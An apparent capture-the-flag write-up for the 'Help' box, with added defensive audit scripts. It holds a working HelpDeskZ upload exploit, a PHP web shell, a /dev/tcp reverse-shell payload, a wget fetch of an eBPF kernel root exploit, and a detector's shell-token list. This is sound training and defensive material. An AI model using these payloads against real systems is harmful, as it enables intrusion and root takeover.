Help is an easy Linux box. A GraphQL endpoint can be enumerated to get a set of credentials for a HelpDesk application. The application is vulnerable to blind SQL injection, which can be exploited to get a password for SSH login. Alternatively, an unauthenticated arbitrary file upload can be exploited to get RCE. The kernel is then found to be vulnerable and can be exploited to get a root shell.
ENUMERATION
Let's begin as always with an Nmap scan (the first scan finds the open ports, the second runs version and script detection against just those ports):
target=127.0.0.1; nmap -T4 -p$(nmap -Pn -T4 $target | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//) -Pn -sVC $target
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 e5bb4d9cdeaf6bbfba8c227ad8d74328 (RSA)
| 256 d5b010507486a39fc5536f3b4a246119 (ECDSA)
|_ 256 e21b88d37621d41e38154a8111b79907 (ED25519)
80/tcp open http Apache httpd 2.4.18
|_http-title: Did not follow redirect to http://help.htb/
|_http-server-header: Apache/2.4.18 (Ubuntu)
3000/tcp open http Node.js Express framework
|_http-title: Site doesn't have a title (application/json; charset=utf-8).
Service Info: Host: 127.0.1.1; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Port 80 redirects to a domain name, so we add it to /etc/hosts:
echo '10.10.10.121 help.htb' >> /etc/hosts
It shows an Apache default installation page. Using ffuf I found the "/support" endpoint:
ffuf -u http://help.htb/FUZZ -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -v -fc 404 -mc all -fs 11321
[Status: 301, Size: 306, Words: 20, Lines: 10, Duration: 21ms]
| URL | http://help.htb/support
| --> | http://help.htb/support/
* FUZZ: support
On it we can find:
Help Desk Software by HelpDeskZ
searchsploit helpdeskz
-------------------------------------------------------------------------------------------------------------------------------
Exploit Title | Path
-------------------------------------------------------------------------------------------------------------------------------
HelpDeskZ 1.0.2 - Arbitrary File Upload | php/webapps/40300.py
HelpDeskZ < 1.0.2 - (Authenticated) SQL Injection / Unauthorized File Download | php/webapps/41200.py
-------------------------------------------------------------------------------------------------------------------------------
Shellcodes: No Results
HelpDeskZ <= v1.0.2 suffers from an unauthenticated shell upload vulnerability.
searchsploit -m php/webapps/40300.py
Exploit: HelpDeskZ 1.0.2 - Arbitrary File Upload
URL: https://www.exploit-db.com/exploits/40300
Path: /usr/share/exploitdb/exploits/php/webapps/40300.py
Codes: N/A
Verified: False
File Type: ASCII text
Copied to: /root/home/40300.py
This exploit does not work (or so I thought at first), because when I try to upload the "shell.php" file I get:
File is not allowed.
I saw that the exploit assumes our file will be saved to:
So we have to enter the full path of the URI where the ticket attachments are saved:
By fuzzing I found this URL:
ffuf -u http://help.htb/support/uploads/FUZZ -w /usr/share/seclists/Discovery/Web-Content/big_lowercase.txt -v -fc 404,403 -mc all
[Status: 301, Size: 322, Words: 20, Lines: 10, Duration: 29ms]
| URL | http://help.htb/support/uploads/tickets
| → | http://help.htb/support/uploads/tickets/
* FUZZ: tickets
I also modified the exploit to use Python 3:
import hashlib
import sys
import requests
import datetime

print('Helpdeskz v1.0.2 - Unauthenticated shell upload exploit')
if len(sys.argv) < 3:
    print("Usage {} [baseUrl] [nameOfUploadedFile]".format(sys.argv[0]))
    sys.exit(1)

helpdeskzBaseUrl = sys.argv[1]  # must end with a slash, e.g. http://help.htb/support/uploads/tickets/
fileName = sys.argv[2]

r = requests.get(helpdeskzBaseUrl)
# Gets the current time of the server to prevent timezone errors - DoctorEww
currentTime = int((datetime.datetime.strptime(r.headers['date'], '%a, %d %b %Y %H:%M:%S %Z') - datetime.datetime(1970, 1, 1)).total_seconds())

# HelpDeskZ stores the upload as md5(originalName + uploadTimestamp).php, so walk back
# up to 300 seconds from the server's clock until one of the candidate names exists
for x in range(0, 300):
    plaintext = fileName + str(currentTime - x)
    md5hash = hashlib.md5(plaintext.encode()).hexdigest()
    url = helpdeskzBaseUrl + md5hash + '.php'
    response = requests.head(url)
    if response.status_code == 200:
        print('found!')
        print(url)
        sys.exit(0)
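On the defensive side, the naming scheme the exploit relies on (md5 of the original filename plus the upload timestamp, stored with a .php extension under a web-served directory) is what turns an attachment into a shell. Below is an added example, not code from this write-up or from HelpDeskZ, of an audit script that flags files in an upload directory which the web server would execute, next to a naming function that uses a random token and an extension allowlist instead. The directory layout, the extension lists and the sample files are constructed for illustration.

```python
"""
Audit an upload directory for files a web server would execute, and show a
non-predictable, non-executable naming scheme for stored attachments.

Added example, not part of the write-up or of HelpDeskZ. EXECUTABLE_EXTENSIONS,
ALLOWED_EXTENSIONS and the demo directory contents are constructed assumptions.
"""
import re
import secrets
import tempfile
from pathlib import Path

# Extensions a typical Apache/PHP handler configuration executes (assumption;
# take the list from the handler configuration actually deployed on the host).
EXECUTABLE_EXTENSIONS = {".php", ".phtml", ".php3", ".php4", ".php5", ".phar"}

# Extensions a helpdesk attachment directory is expected to contain (assumption).
ALLOWED_EXTENSIONS = {".txt", ".png", ".jpg", ".jpeg", ".pdf", ".log"}

PHP_OPEN_TAG = re.compile(rb"<\?(php|=)", re.IGNORECASE)


def scan_upload_dir(root):
    """Return a sorted list of (relative path, reason) for suspicious files.

    A file is flagged when its extension is one the web server executes, or when
    its content opens a PHP tag regardless of extension (renamed or
    double-extension shells that a later configuration change could expose).
    """
    findings = []
    root = Path(root)
    for path in root.rglob("*"):
        if not path.is_file():
            continue
        rel = str(path.relative_to(root))
        if path.suffix.lower() in EXECUTABLE_EXTENSIONS:
            findings.append((rel, "executable extension"))
            continue
        with path.open("rb") as fh:
            head = fh.read(4096)  # a shell's open tag sits at the start of the file
        if PHP_OPEN_TAG.search(head):
            findings.append((rel, "php open tag in content"))
    return sorted(findings)


def safe_upload_name(original_name):
    """Pick a stored filename that is neither predictable nor executable.

    HelpDeskZ derived the stored name from md5(filename + upload time), which a
    client can reproduce. A random token with an allowlisted extension removes
    both the predictable name and the executable extension.
    """
    ext = Path(original_name).suffix.lower()
    if ext not in ALLOWED_EXTENSIONS:
        raise ValueError(f"extension {ext!r} not allowed")
    return secrets.token_hex(16) + ext


def build_demo_dir():
    """Create a constructed sample ticket upload directory in a temp location."""
    root = Path(tempfile.mkdtemp(prefix="tickets_"))
    # the shell from the write-up, under the hashed name the exploit found
    (root / "e7e5ce96e6c0ffbdb06a2a1dc659bd06.php").write_bytes(
        b'<pre>\n<?php echo system($_GET["cmd"]); ?>\n</pre>\n')
    (root / "screenshot.png").write_bytes(b"\x89PNG\r\n\x1a\n")  # benign attachment
    (root / "notes.txt").write_bytes(b"<?php phpinfo(); ?>")      # PHP hiding behind .txt
    (root / "report.pdf").write_bytes(b"%PDF-1.4")               # benign attachment
    return root


if __name__ == "__main__":
    demo = build_demo_dir()
    for rel, reason in scan_upload_dir(demo):
        print(f"{rel}: {reason}")
    print("stored name for attachment.pdf:", safe_upload_name("attachment.pdf"))
```

Run against the real directory (here /var/www/html/support/uploads/tickets) the scan is a quick post-incident check; the naming function is the shape of the fix, and pairing it with a web server rule that refuses to execute anything under the upload tree covers the case where the allowlist is wrong.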
EXPLOITATION
This is my shell.php file:
<pre>
<?php echo system($_GET["cmd"]); ?>
</pre>
With that, the exploit worked:
python 40300.py 'http://help.htb/support/uploads/tickets/' 'shell.php'
Helpdeskz v1.0.2 - Unauthenticated shell upload exploit
found!
http://help.htb/support/uploads/tickets/e7e5ce96e6c0ffbdb06a2a1dc659bd06.php
Going to the URL (the output appears twice because system() prints the command output and echo then prints its return value, the last output line):
http://help.htb/support/uploads/tickets/e7e5ce96e6c0ffbdb06a2a1dc659bd06.php?cmd=id
uid=1000(help) gid=1000(help) groups=1000(help),4(adm),24(cdrom),30(dip),33(www-data),46(plugdev),114(lpadmin),115(sambashare)
uid=1000(help) gid=1000(help) groups=1000(help),4(adm),24(cdrom),30(dip),33(www-data),46(plugdev),114(lpadmin),115(sambashare)
This payload gave me a shell:
http://help.htb/support/uploads/tickets/e7e5ce96e6c0ffbdb06a2a1dc659bd06.php?cmd=bash%20-c%20%22bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F10.10.16.31%2F6666%200%3E%261%22
On my nc listener:
nc -nlvp 6666
Listening on 0.0.0.0 6666
Connection received on 10.10.10.121 50190
bash: cannot set terminal process group (907): Inappropriate ioctl for device
bash: no job control in this shell
help@help:/var/www/html/support/uploads/tickets$ whoami
whoami
help
help@help:/var/www/html/support/uploads/tickets$ hostname
hostname
help
help@help:/var/www/html/support/uploads/tickets$
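From the web server's point of view, the probing, the id check and the reverse shell above all land in Apache's access log. The following added example, which is not part of this write-up, parses combined-format log lines, decodes the query string and flags requests that execute a script from the upload directory or pass shell constructs in a cmd parameter. The log lines are constructed to mirror the requests made above; the upload path prefix and the token list are assumptions to tune per deployment.

```python
"""
Flag web-shell style requests in an Apache "combined" access log.

Added example, not part of the original write-up. SAMPLE_LOG is constructed to
mirror the requests made in the write-up; UPLOAD_DIRS and SHELL_TOKENS are
assumptions a defender would tune to their own deployment.
"""
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Apache combined format: ip ident user [time] "method target proto" status size "referer" "ua"
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# Directories that hold user uploads and should never serve executable scripts (assumption).
UPLOAD_DIRS = ("/support/uploads/",)
SCRIPT_EXT = re.compile(r"\.(php\d?|phtml|phar)$", re.IGNORECASE)

# Shell constructs that have no business in a helpdesk query string (assumption).
SHELL_TOKENS = ("/dev/tcp/", "bash -i", "nc -e", "/bin/sh", "| bash", "| sh")


def reasons_for(target):
    """Return the reasons a request target looks like web-shell activity ([] if none)."""
    reasons = []
    url = urlsplit(target)
    path = unquote(url.path)
    if path.startswith(UPLOAD_DIRS) and SCRIPT_EXT.search(path):
        reasons.append("script executed from upload directory")
    # parse_qsl percent-decodes values, so encoded payloads are matched in clear text
    for key, value in parse_qsl(url.query, keep_blank_values=True):
        if key == "cmd":
            reasons.append(f"command parameter cmd={value!r}")
        lowered = value.lower()
        for token in SHELL_TOKENS:
            if token in lowered:
                reasons.append(f"shell token {token!r} in query")
    return reasons


def scan_log(lines):
    """Return [(client ip, request target, reasons)] for every flagged line."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not combined format; skip rather than guess at the fields
        reasons = reasons_for(m.group("target"))
        if reasons:
            hits.append((m.group("ip"), m.group("target"), reasons))
    return hits


# Constructed log lines mirroring the write-up's requests (not real server logs).
SAMPLE_LOG = [
    '10.10.16.31 - - [18/Jul/2023:13:01:02 +0000] "GET /support/ HTTP/1.1" 200 4732 "-" "Mozilla/5.0"',
    '10.10.16.31 - - [18/Jul/2023:13:05:10 +0000] "HEAD /support/uploads/tickets/e7e5ce96e6c0ffbdb06a2a1dc659bd06.php HTTP/1.1" 200 - "-" "python-requests/2.31"',
    '10.10.16.31 - - [18/Jul/2023:13:05:40 +0000] "GET /support/uploads/tickets/e7e5ce96e6c0ffbdb06a2a1dc659bd06.php?cmd=id HTTP/1.1" 200 312 "-" "Mozilla/5.0"',
    '10.10.16.31 - - [18/Jul/2023:13:06:15 +0000] "GET /support/uploads/tickets/e7e5ce96e6c0ffbdb06a2a1dc659bd06.php?cmd=bash%20-c%20%22bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F10.10.16.31%2F6666%200%3E%261%22 HTTP/1.1" 200 - "-" "Mozilla/5.0"',
    '10.10.16.31 - - [18/Jul/2023:13:07:00 +0000] "GET /support/uploads/tickets/screenshot.png HTTP/1.1" 200 8831 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for ip, target, reasons in scan_log(SAMPLE_LOG):
        print(ip, target)
        for reason in reasons:
            print("   ", reason)
```

The HEAD probe is flagged on the path alone, which is the earliest signal: a 200 for a .php under uploads/tickets means the server is already willing to execute attachments, before any cmd parameter arrives.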
ROOT
From LinPEAS I got:
Linux version 4.4.0-116-generic (buildd@lgw01-amd64-021) (gcc version 5.4.0 20160609 (Ubuntu 5.4.0-6ubuntu1~16.04.9) ) #140-Ubuntu SMP Mon Feb 12 21:23:04 UTC 2018
[+] [CVE-2017-16995] eBPF_verifier
Details: https://ricklarabee.blogspot.com/2018/07/ebpf-and-analysis-of-get-rekt-linux.html
Exposure: highly probable
Tags: debian=9.0{kernel:4.9.0-3-amd64},fedora=25|26|27,ubuntu=14.04{kernel:4.4.0-89-generic},[ ubuntu=(16.04|17.04) ]{kernel:4.(8|10).0-(19|28|45)-generic}
Download URL: https://www.exploit-db.com/download/45010
Comments: CONFIG_BPF_SYSCALL needs to be set && kernel.unprivileged_bpf_disabled != 1
[+] [CVE-2016-5195] dirtycow
Details: https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails
Exposure: highly probable
Tags: debian=7|8,RHEL=5{kernel:2.6.(18|24|33)-*},RHEL=6{kernel:2.6.32-*|3.(0|2|6|8|10).*|2.6.33.9-rt31},RHEL=7{kernel:3.10.0-*|4.2.0-0.21.el7},[ ubuntu=16.04|14.04|12.04 ]
Download URL: https://www.exploit-db.com/download/40611
Comments: For RHEL/CentOS see exact vulnerable versions here: https://access.redhat.com/sites/default/files/rh-cve-2016-5195_5.sh
[+] [CVE-2016-5195] dirtycow 2
Details: https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails
Exposure: highly probable
Tags: debian=7|8,RHEL=5|6|7,ubuntu=14.04|12.04,ubuntu=10.04{kernel:2.6.32-21-generic},[ ubuntu=16.04 ]{kernel:4.4.0-21-generic}
Download URL: https://www.exploit-db.com/download/40839
ext-url: https://www.exploit-db.com/download/40847
Comments: For RHEL/CentOS see exact vulnerable versions here: https://access.redhat.com/sites/default/files/rh-cve-2016-5195_5.sh
╔══════════╣ Executing Linux Exploit Suggester 2
╚ https://github.com/jondonas/linux-exploit-suggester-2
[1] af_packet
CVE-2016-8655
Source: http://www.exploit-db.com/exploits/40871
[2] exploit_x
CVE-2018-14665
Source: http://www.exploit-db.com/exploits/45697
[3] get_rekt
CVE-2017-16695
Source: http://www.exploit-db.com/exploits/45010
Looking at the exploit that showed up in both Linux Exploit Suggester and LinPEAS:
[+] [CVE-2017-16995] eBPF_verifier
Details: https://ricklarabee.blogspot.com/2018/07/ebpf-and-analysis-of-get-rekt-linux.html
Exposure: highly probable
Tags: debian=9.0{kernel:4.9.0-3-amd64},fedora=25|26|27,ubuntu=14.04{kernel:4.4.0-89-generic},[ ubuntu=(16.04|17.04) ]{kernel:4.(8|10).0-(19|28|45)-generic}
Download URL: https://www.exploit-db.com/download/45010
Comments: CONFIG_BPF_SYSCALL needs to be set && kernel.unprivileged_bpf_disabled != 1
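The LinPEAS comment states the two conditions this entry depends on: CONFIG_BPF_SYSCALL set and kernel.unprivileged_bpf_disabled != 1. The following added example (not part of this write-up, LinPEAS or the exploit) checks both from a /proc/version line, the sysctl value and the kernel config text, so an administrator can confirm the sysctl hardening is in place on a host. The sample inputs are constructed, with the version line copied from the LinPEAS output above; the file paths in audit_host are the standard procfs and /boot locations.

```python
"""
Audit the two preconditions LinPEAS attaches to its CVE-2017-16995 (eBPF
verifier) entry: CONFIG_BPF_SYSCALL set and kernel.unprivileged_bpf_disabled != 1.

Added example; not part of the write-up, LinPEAS or the exploit. SAMPLE_VERSION
is the write-up's kernel line, SAMPLE_CONFIG is constructed.
"""
import os
import re

VERSION_RE = re.compile(r"Linux version (\d+)\.(\d+)\.(\d+)(?:-(\d+))?")

# Meaning of kernel.unprivileged_bpf_disabled per Documentation/admin-guide/sysctl/kernel.rst.
BPF_SYSCTL_MEANING = {
    0: "unprivileged bpf() enabled",
    1: "unprivileged bpf() disabled (cannot be re-enabled)",
    2: "unprivileged bpf() disabled (can be re-enabled by writing 0)",
}


def parse_kernel_version(version_line):
    """Return (major, minor, patch, abi) from a /proc/version style line.

    abi is the distro build number after the dash (116 for 4.4.0-116-generic),
    or None when the release carries none.
    """
    m = VERSION_RE.search(version_line)
    if not m:
        raise ValueError("no 'Linux version x.y.z' in input")
    major, minor, patch, abi = m.groups()
    return int(major), int(minor), int(patch), int(abi) if abi else None


def bpf_sysctl_state(value_text):
    """Map the sysctl's text value to (int value, meaning); non-numeric input -> (None, 'unavailable')."""
    try:
        value = int(value_text.strip())
    except ValueError:
        return None, "unavailable"
    return value, BPF_SYSCTL_MEANING.get(value, "unknown value")


def config_has_bpf_syscall(config_text):
    """True when a kernel .config or /boot/config-* text sets CONFIG_BPF_SYSCALL=y."""
    return re.search(r"^CONFIG_BPF_SYSCALL=y\s*$", config_text, re.MULTILINE) is not None


def assess(version_line, sysctl_text, config_text):
    """Apply LinPEAS' two conditions; return (unprivileged bpf reachable, notes).

    The first element is True/False, or None when an input was unavailable.
    LinPEAS tests '!= 1'; newer kernels also accept 2, which disables
    unprivileged bpf() as well, so only 0 is treated as reachable here.
    """
    major, minor, patch, abi = parse_kernel_version(version_line)
    value, meaning = bpf_sysctl_state(sysctl_text)
    notes = [f"kernel {major}.{minor}.{patch}" + (f"-{abi}" if abi is not None else "")]
    if value is None or not config_text:
        notes.append("undetermined: sysctl value or kernel config unavailable")
        return None, notes
    has_syscall = config_has_bpf_syscall(config_text)
    notes.append(f"CONFIG_BPF_SYSCALL={'y' if has_syscall else 'not set'}")
    notes.append(f"kernel.unprivileged_bpf_disabled={value} ({meaning})")
    reachable = has_syscall and value == 0
    notes.append("unprivileged bpf() reachable: set kernel.unprivileged_bpf_disabled=1"
                 if reachable else "unprivileged bpf() not reachable")
    return reachable, notes


def read_or_default(path, default):
    """Read a text file, returning default when it is absent (e.g. not on Linux)."""
    try:
        with open(path) as fh:
            return fh.read()
    except OSError:
        return default


def audit_host():
    """Assess the running host from the standard procfs and /boot locations."""
    release = os.uname().release if hasattr(os, "uname") else ""
    version = read_or_default("/proc/version", "Linux version 0.0.0")
    sysctl = read_or_default("/proc/sys/kernel/unprivileged_bpf_disabled", "")
    config = read_or_default(f"/boot/config-{release}", "")
    return assess(version, sysctl, config)


# Constructed sample: the write-up's kernel line, bpf syscall built in, sysctl left at 0.
SAMPLE_VERSION = ("Linux version 4.4.0-116-generic (buildd@lgw01-amd64-021) "
                  "(gcc version 5.4.0 20160609 (Ubuntu 5.4.0-6ubuntu1~16.04.9) ) "
                  "#140-Ubuntu SMP Mon Feb 12 21:23:04 UTC 2018")
SAMPLE_CONFIG = "CONFIG_BPF=y\nCONFIG_BPF_SYSCALL=y\nCONFIG_BPF_JIT=y\n"

if __name__ == "__main__":
    for note in assess(SAMPLE_VERSION, "0\n", SAMPLE_CONFIG)[1]:
        print(note)
```

Setting the sysctl closes the path an unprivileged user has to the verifier, but it is a mitigation for this bug class, not a patch: the kernel still needs the fixed build from the distribution.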
I got the exploit and launched it:
help@help:/tmp$ wget 10.10.16.31/45010.c
--2023-07-18 13:09:34--  http://10.10.16.31/45010.c
Connecting to 10.10.16.31:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 13728 (13K) [text/x-csrc]
Saving to: '45010.c'
45010.c 100%[===================>] 13.41K --.-KB/s in 0.05s
2023-07-18 13:09:34 (294 KB/s) - '45010.c' saved [13728/13728]
help@help:/tmp$ gcc 45010.c -o expl -pthread -lcrypt
help@help:/tmp$ ./expl
[.]
[.] t(-_-t) exploit for counterfeit grsec kernels such as KSPP and linux-hardened t(-_-t)
[.]
[.] ** This vulnerability cannot be exploited at all on authentic grsecurity kernel **
[.]
[*] creating bpf map
[*] sneaking evil bpf past the verifier
[*] creating socketpair()
[*] attaching bpf backdoor to socket
[*] skbuff => ffff8800368ea000
[*] Leaking sock struct from ffff880038746000
[*] Sock->sk_rcvtimeo at offset 472
[*] Cred structure at ffff88000b61d080
[*] UID from cred structure: 1000, matches the current: 1000
[*] hammering cred structure at ffff88000b61d080
[*] credentials patched, launching shell…
\[\e[32m\]\u@\h\[\e[0m\]:\[\e[34m\]\w\[\e[0m\]$ whoami
root
\[\e[32m\]\u@\h\[\e[0m\]:\[\e[34m\]\w\[\e[0m\]$ bash
root@help:/tmp# hostname
help
root@help:/tmp#